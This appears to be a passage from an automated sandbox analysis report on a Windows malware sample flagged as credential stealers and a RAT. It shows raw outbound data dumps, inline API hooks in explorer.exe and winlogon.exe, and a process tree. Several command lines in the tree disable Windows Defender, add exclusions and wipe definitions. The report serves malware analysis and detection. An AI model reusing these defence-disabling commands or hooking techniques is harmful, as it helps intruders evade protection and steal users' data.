                                                                  2024-08-01 02:28:10 UTC16384OUTData Raw: 0e 7c 06 62 5c 55 d5 ec ab 08 b0 9b 00 2e 2e b2 89 4c db c4 87 47 d5 26 56 16 de 1c f5 0c 5b 23 91 fb c7 3b 2c c6 f8 e1 69 a8 58 22 ed e2 f8 5b 70 4b 76 6c fe fb 1d cb 99 ec 16 6b 40 f3 bc 97 eb a7 01 c5 86 9a bb 9c 6e db ce 52 c0 06 30 1a df 53 67 2f d2 e3 03 8c 33 3b ec 2a 47 d8 f8 87 cc 95 dc 17 d5 c3 5e d2 37 55 1a 7a 8a b1 78 fc 5b b8 d5 5e ee 73 83 a0 a6 84 e8 fc d6 52 e8 b8 fb 6a 57 5b 39 de 35 14 f1 b0 95 b6 7e 04 15 27 97 84 c9 13 51 e1 80 d0 51 63 56 2d 23 69 0a 34 2c 17 9c 35 a7 07 71 4c 11 e8 23 cc 8f ec 91 24 f2 6a 54 c7 98 e9 02 99 fc b6 23 f7 ba c0 21 58 58 a4 0b 66 a1 94 73 34 87 f2 6a 4b 10 71 a5 80 f5 5f fb 4d 0a 30 3b f3 7e c8 98 d2 ef eb 9a d9 5a ab ed ad 1b a9 d6 58 ff 43 8e 36 98 48 71 30 1c 67 5e 02 8b f8 d4 74 6b dd d4 21 ad c8 9b
                                                                  Data Ascii: |b\U..LG&V[#;,iX"[pKvlk@nR0Sg/3;*G^7Uzx[^sRjW[95~'QQcV-#i4,5qL#$jT#!XXfs4jKq_M0;~ZXC6Hq0g^tk!
                                                                  2024-08-01 02:28:10 UTC16384OUTData Raw: f5 73 8b da a2 a5 09 83 16 4e 0d c8 2f fc 6c 23 8b 61 04 0b 92 72 3d 64 1e 90 38 d6 78 71 60 8b b9 19 c8 de c2 4c 96 b0 94 ac 76 d2 9b 3c 88 f9 ed 1f 76 b6 1f a8 20 94 0c a4 36 1c f0 a5 91 ff 4b d7 1b 17 35 7f bf c7 c1 98 ac 55 6b c3 c8 c8 f5 5c 3a 43 b2 84 f5 dd c6 08 b1 de 24 26 c2 e4 8a ee 78 2c 3f 7c af 74 6a 60 3f 49 cf c7 95 4c 16 d1 69 ec 69 e9 19 1f a3 53 bb d9 f7 8e 32 72 59 a2 1b 85 9f 79 8d 05 1a e3 ae 1a cd 1a 0a e8 f0 2e 8d 94 24 21 b4 a1 d8 fb 2f ab e8 31 c6 01 73 9e 2a c1 27 27 fe 71 c5 11 f3 ac 78 d7 06 13 2d f6 4a 5d 7e 83 5a 52 3d 7e 2b 28 c9 3c 53 ca bb a9 c1 59 42 5a 2d dd 19 b2 44 ff 18 10 3b 2c 91 d0 f4 13 89 52 96 c9 0b 80 79 84 20 98 7b d9 d4 e6 c7 76 1a e3 ba 4f f5 7d aa d1 e3 87 6f 31 f4 b6 84 19 51 6e 97 f4 08 28 29 ce 28 69 9b
                                                                  Data Ascii: sN/l#ar=d8xq`Lv<v 6K5Uk\:C$&x,?|tj`?ILiiS2rYy.$!/1s*''qx-J]~ZR=~+(<SYBZ-D;,Ry {vO}o1Qn()(i
                                                                  2024-08-01 02:28:10 UTC16384OUTData Raw: 6f 46 08 f3 69 6d 59 26 99 13 95 6b f3 ae 5f 7e aa ae 73 c8 96 07 2b 8c fb 64 0e 57 a3 f8 b9 40 83 b0 04 c4 d0 c1 68 15 10 f2 bf 37 59 2d 2e 6b d6 b9 f6 82 0c 06 d2 7d 16 4d 29 e2 6a c1 6e a9 fa 7d 6c 3a 6b 37 1c a9 e6 39 6b 39 df f6 40 ad 83 76 52 86 e9 b1 5b 69 de e5 7d 08 7e 35 dc 1f b0 0a 2b 04 3d 7d 8a 8c 11 c0 a7 af 74 f4 87 23 b7 c0 87 53 4a 15 41 e7 d7 a8 1d 4f b5 c8 c0 b5 0e 20 53 64 37 6d 85 36 d7 ff 15 27 0f 58 0e e3 25 52 1e 7b 82 66 f0 4c f4 a3 0f e6 19 97 14 24 42 fb aa af 55 33 fd 85 e9 bc ee e1 50 32 00 a9 0c 77 d7 34 3d 8d 12 eb d8 34 18 56 e3 e2 d7 33 df 33 85 d4 83 12 d9 55 86 44 9f f4 f5 f7 f7 b6 9c af ae fb fb 68 14 09 d0 7e 7c ac b2 41 5b 80 a5 99 9e f7 ad 7b 31 7a 88 c6 3c 36 dc 37 82 47 df 11 f7 d3 23 e9 c0 80 83 0a f9 bb 8e 9d 7c
                                                                  Data Ascii: oFimY&k_~s+dW@h7Y-.k}M)jn}l:k79k9@vR[i}~5+=}t#SJAO Sd7m6'X%R{fL$BU3P2w4=4V33UDh~|A[{1z<67G#|
                                                                  2024-08-01 02:28:10 UTC16384OUTData Raw: 01 36 a5 ab 47 3f 80 da e1 00 b3 14 ad 9e e8 71 26 7a d9 de 9a bc 20 9e f1 da 20 48 da 59 54 ab 6e 10 95 a9 d0 fa c4 00 12 27 9c d2 3f 3c ec c1 1d d6 6c 54 72 df b3 a0 8e 9c 0b 68 39 e4 c4 f1 e3 c6 4f d5 83 43 26 da b8 11 40 e0 90 f3 9e 7c 4a fe 20 f0 4e 81 d4 47 5e 70 e2 84 a8 28 76 00 65 08 63 b5 b3 15 e5 e2 7c 8d 24 e2 21 35 1e 6d 6d 5a 2d d1 18 5e b3 cf 73 e5 64 93 b8 38 52 67 76 f9 2f ca 28 cb f6 96 28 80 72 3c b0 ed da 86 39 34 d3 fe 79 e0 a3 0c 8f a8 d2 c6 fb 9b d7 30 53 eb f6 07 82 22 80 e2 4c 21 34 e9 bd b6 54 0c e9 44 ed 5b 7e 19 12 96 ac f2 52 54 78 81 c3 02 4c d4 69 ac e5 16 bc 70 ee 76 f3 98 54 43 b1 9d 54 83 eb 0f 5b 48 20 27 6f 2f f6 e2 00 f4 12 c5 3e 4c 35 cd 7e 57 4f 83 bc 60 7c 1d cd 55 c9 b9 d3 41 30 81 a8 90 3d 5d 1f 15 a3 50 12 a2 bf
                                                                  Data Ascii: 6G?q&z HYTn'?<lTrh9OC&@|J NG^p(vec|$!5mmZ-^sd8Rgv/((r<94y0S"L!4TD[~RTxLipvTCT[H 'o/>L5~WO`|UA0=]P
                                                                  2024-08-01 02:28:10 UTC16384OUTData Raw: c6 87 23 d6 fd c9 17 f6 e8 36 ff 81 50 da 24 6c 71 4d 73 1a bd d2 d2 25 c5 2e 4f 5f 34 d9 09 b2 5b 33 3b 5b 41 6f 92 b8 9c 4f 3a ee 45 cc 51 4a 83 f0 5e 3e 37 46 37 e2 43 18 6e 88 b4 ea f2 1d bd e6 f5 2b 5d 66 78 36 fa 65 bb 84 21 d9 be ef 2f cf 23 fe 9f 71 f7 f5 5a f8 4f 80 84 4d 2f bc 02 cc 94 6f e4 ab c8 11 d3 ac 9c 1b 55 74 58 62 95 3e 6e 93 c8 45 95 16 b3 78 a6 24 45 de 8e 4b 34 ed de 09 6b c3 6d dc 66 c9 67 b4 e0 ed 41 a4 df 2d 8a 86 c8 cf e6 38 55 41 e8 16 75 08 1a 71 5b 68 ca 97 86 95 b8 19 9c 90 6f cf 43 91 6b e2 71 70 6b 00 ac 65 6c 13 0c 2e 87 1d 65 fb b0 8f 26 6e 19 f9 2d ed b8 df a8 3f 2a 6a b2 e5 f9 a7 a2 47 bb 7e de 09 8e 82 cb cf 25 89 93 59 34 b0 18 9c de 7d 4e 45 95 80 1e bd 8f 76 b3 98 ec 9c 75 87 0d 11 1d cf 2b 42 28 74 ee 3f 73 31 b3
                                                                  Data Ascii: #6P$lqMs%.O_4[3;[AoO:EQJ^>7F7Cn+]fx6e!/#qZOM/oUtXb>nEx$EK4kmfgA-8UAuq[hoCkqpkel.e&n-?*jG~%Y4}NEvu+B(t?s1
                                                                  2024-08-01 02:28:10 UTC16384OUTData Raw: 71 07 29 d0 0e a8 63 d6 56 a6 0e 10 56 d6 3b 3f 03 ad d7 9d 67 5d c0 46 3c 1d 0b c0 90 c3 93 dd ba da 19 dd 7b c8 6b 3e 00 d0 ea 21 17 51 21 83 b8 5d 78 9e 83 10 2f d4 83 d0 2d 46 c8 a4 e5 83 8b b9 63 c7 e2 a9 38 f7 7c 63 a6 9f 88 13 94 db f4 a2 6a 28 19 be 00 19 f8 83 f8 c8 b9 01 2e 95 13 ae 4c e1 37 6d d4 95 4b 4f d2 f7 07 22 e7 a2 ce 02 25 2f d9 54 a9 a9 9e 3a 8e 4f a9 0f f2 b0 98 2d 3e c8 78 7f ff 66 a9 e6 d0 58 5e f2 ed 99 bb 88 7f f1 fa 75 93 50 37 8b 01 a3 28 9f 29 4b 9a 8c 8a e9 ad d5 2b 73 a5 4d f0 1d 3d d2 97 9e 10 3b 7f ac ac 09 80 91 ca d3 4a ef 3a d0 68 fa 2d 05 d1 b7 4d 6f 9a 12 c6 9c d2 f6 76 a1 cd 52 20 bb 9b 06 fb 7b da 31 34 10 2d ae 51 87 82 aa cd 8a 5e 40 d5 0f cc b4 0c fe 03 d4 36 c0 5b 43 12 1e 4d 88 89 a2 e6 c4 b1 80 07 73 04 66 04
                                                                  Data Ascii: q)cVV;?g]F<{k>!Q!]x/-Fc8|cj(.L7mKO"%/T:O->xfX^uP7()K+sM=;J:h-MovR {14-Q^@6[CMsf
                                                                  2024-08-01 02:28:10 UTC16384OUTData Raw: 32 f1 71 36 f3 d6 c8 e8 03 5b a4 36 03 6d f8 45 e4 5c 93 c3 88 32 e4 e2 7e 89 18 8a 34 0b 0b 09 fa fb 88 d7 30 c3 91 1c 01 c9 f4 db 36 7c 05 01 31 b3 21 02 3d cf 35 ca 33 ff ed 14 d7 c1 94 ff 1d b9 f5 87 94 26 6e 00 b1 2d 0f 60 c2 77 6c ee 6d e1 7e c0 39 99 87 ac 0d 43 c7 fb 29 8f a2 c7 a8 43 42 8c 6d e6 63 cc b1 a2 af d6 cf 24 73 ac 6e a3 d7 6c db b0 c3 a7 21 5e 1e cc ae a5 6a 11 76 9e d8 c4 2a 8d 2a a3 79 d8 f1 6d 3b 6f bd b6 2d 4f b1 71 b6 d7 90 81 31 76 ab 64 d4 c3 b4 3a 31 af 9d c5 f9 63 d1 52 17 c6 23 b0 16 15 a8 bc 51 2a cd af 38 f2 3f 45 7c 70 c0 d4 ae 24 d3 17 87 6c 8b 40 e2 57 f4 37 f6 61 8b 75 9e f0 6c 00 c2 82 73 2b 2b d9 56 ce d8 bb 7d 4f 26 c2 8c 96 d0 6e 12 b5 53 da eb f3 6d df 59 d5 de b1 e3 41 98 57 6f 6c 33 5b 9e 45 1a 27 7f f0 9a c3 ec
                                                                  Data Ascii: 2q6[6mE\2~406|1!=53&n-`wlm~9C)CBmc$snl!^jv**ym;o-Oq1vd:1cR#Q*8?E|p$l@W7auls++V}O&nSmYAWol3[E'
                                                                  2024-08-01 02:28:11 UTC389INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Thu, 01 Aug 2024 02:28:11 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1730
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                  Code Manipulations

                                                                  Function NameHook TypeActive in Processes
                                                                  ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                  NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                  ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                  NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                  ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                  NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                  NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                  ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                  ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                  NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                  RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                                  NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                  NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                  ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                  ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                  Function NameHook TypeNew Data
                                                                  ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                  NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                  ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                  NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                  ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                  NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                  NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                  ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                  ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                  NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                  RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                  NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                  NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                  ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                  ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                  Function NameHook TypeNew Data
                                                                  ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                  NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                  ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                  NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                  ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                  NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                  NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                  ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                  ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                  NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                  RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                  NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                  NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                  ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                  ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:22:26:57
                                                                  Start date:31/07/2024
                                                                  Path:C:\Users\user\Desktop\8Ck8T5qRcC.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\8Ck8T5qRcC.exe"
                                                                  Imagebase:0xd90000
                                                                  File size:17'830'453 bytes
                                                                  MD5 hash:4FEC8FAF6590F62034AD44A54175B9E9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:22:26:59
                                                                  Start date:31/07/2024
                                                                  Path:C:\ProgramData\Microsoft\hacn.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\ProgramData\Microsoft\hacn.exe"
                                                                  Imagebase:0x7ff67d000000
                                                                  File size:11'662'615 bytes
                                                                  MD5 hash:FC445049713C02F9A9DDAA62E404C9E9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 71%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:22:26:59
                                                                  Start date:31/07/2024
                                                                  Path:C:\ProgramData\Microsoft\based.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\ProgramData\Microsoft\based.exe"
                                                                  Imagebase:0x7ff727260000
                                                                  File size:6'127'126 bytes
                                                                  MD5 hash:838A5BD59DE32F425938CBA6C119CBEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1686411097.000001F919A15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1686411097.000001F919A13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 55%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:22:27:01
                                                                  Start date:31/07/2024
                                                                  Path:C:\ProgramData\Microsoft\hacn.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\ProgramData\Microsoft\hacn.exe"
                                                                  Imagebase:0x7ff67d000000
                                                                  File size:11'662'615 bytes
                                                                  MD5 hash:FC445049713C02F9A9DDAA62E404C9E9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:22:27:01
                                                                  Start date:31/07/2024
                                                                  Path:C:\ProgramData\Microsoft\based.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\ProgramData\Microsoft\based.exe"
                                                                  Imagebase:0x7ff727260000
                                                                  File size:6'127'126 bytes
                                                                  MD5 hash:838A5BD59DE32F425938CBA6C119CBEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:22:27:01
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:22:27:01
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:22:27:01
                                                                  Start date:31/07/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym
                                                                  Imagebase:0xd80000
                                                                  File size:6'361'390 bytes
                                                                  MD5 hash:E5DB23B3AAF4DDDD2BAF96FB7BBA9616
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000003.1702500179.00000000076F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 21%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:22:27:04
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:22:27:04
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:22:27:04
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:22:27:04
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:22:27:04
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:22:27:04
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:22:27:04
                                                                  Start date:31/07/2024
                                                                  Path:C:\ProgramData\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\ProgramData\svchost.exe"
                                                                  Imagebase:0x160000
                                                                  File size:4'042'529 bytes
                                                                  MD5 hash:45C59202DCE8ED255B4DBD8BA74C630F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000003.1722014407.0000000005600000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000003.1722722653.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 61%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:22:27:04
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:16
                                                                  Start time:22:27:04
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:17
                                                                  Start time:22:27:04
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:18
                                                                  Start time:22:27:04
                                                                  Start date:31/07/2024
                                                                  Path:C:\ProgramData\setup.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\ProgramData\setup.exe"
                                                                  Imagebase:0x7ff7fc930000
                                                                  File size:5'617'152 bytes
                                                                  MD5 hash:1274CBCD6329098F79A3BE6D76AB8B97
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 71%, ReversingLabs
                                                                  Has exited:true

                                                                  Target ID:19
                                                                  Start time:22:27:05
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                                                  Imagebase:0x560000
                                                                  File size:147'456 bytes
                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:20
                                                                  Start time:22:27:05
